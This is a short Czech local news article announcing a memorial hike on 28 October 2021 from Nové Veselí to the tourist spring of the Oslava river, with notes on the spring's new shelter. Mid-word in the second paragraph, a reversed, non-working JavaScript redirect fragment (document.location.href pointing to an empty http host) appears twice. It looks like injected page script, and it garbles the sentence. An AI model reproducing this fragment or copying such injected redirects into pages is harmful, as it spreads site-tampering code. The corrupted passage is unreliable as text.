Rainbow page separator

O státním svátku se turisté pustí k prameni řeky Oslavy

Středa, 27. října 2021

Nové Veselí / Na pochod k prameni řeky Oslavy se ve čtvrtek 28. října vydají nejenom novoveselští příznivci turistiky a vycházek do přírody. Start je o půl desáté od tamní sokolovny. Tradiční akce s názvem Pochod k prameni řeky Oslavy je od roku 2016 současně pořádána jako memoriál Miroslava Zity ve spolupráci tamní TJ Sokol, členů mysliveckého sdružení a místní organizace Českého svazu zahrádkářů. Občerstvení po pochodu bude zajištěno v myslivecké chatě pod hrází Matějovského rybníka, přičemž pro členy pořádajících spolků je zdarma.
Turistický pramen řeky Oslavy, který se nachází nedaleko rybníka Velký Babín v katastru Matějova, se před dvěma lety dočkal nového dřevěného „domečku“ nad studánkou. Vyrobili ho a nainstalovali dobrovolníci z Nového Veselí poté, co původní kruhový domek, který pramen chránil dlouhou řadu let, zničili vandalové. Skutečný geografický pramen řeky Oslavy se však nachází o několik s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek metrů dál severozápadním směrem v mokřadech kolem rybníka.
Turistickým pramenem Oslavy byla studánka před více než patnácti lety označena současným prezidentem Milošem Zemanem a jeho přáteli. K prameni vede odbočka z modré turistické značky spojující rozcestí U Křížku a rybník Babín.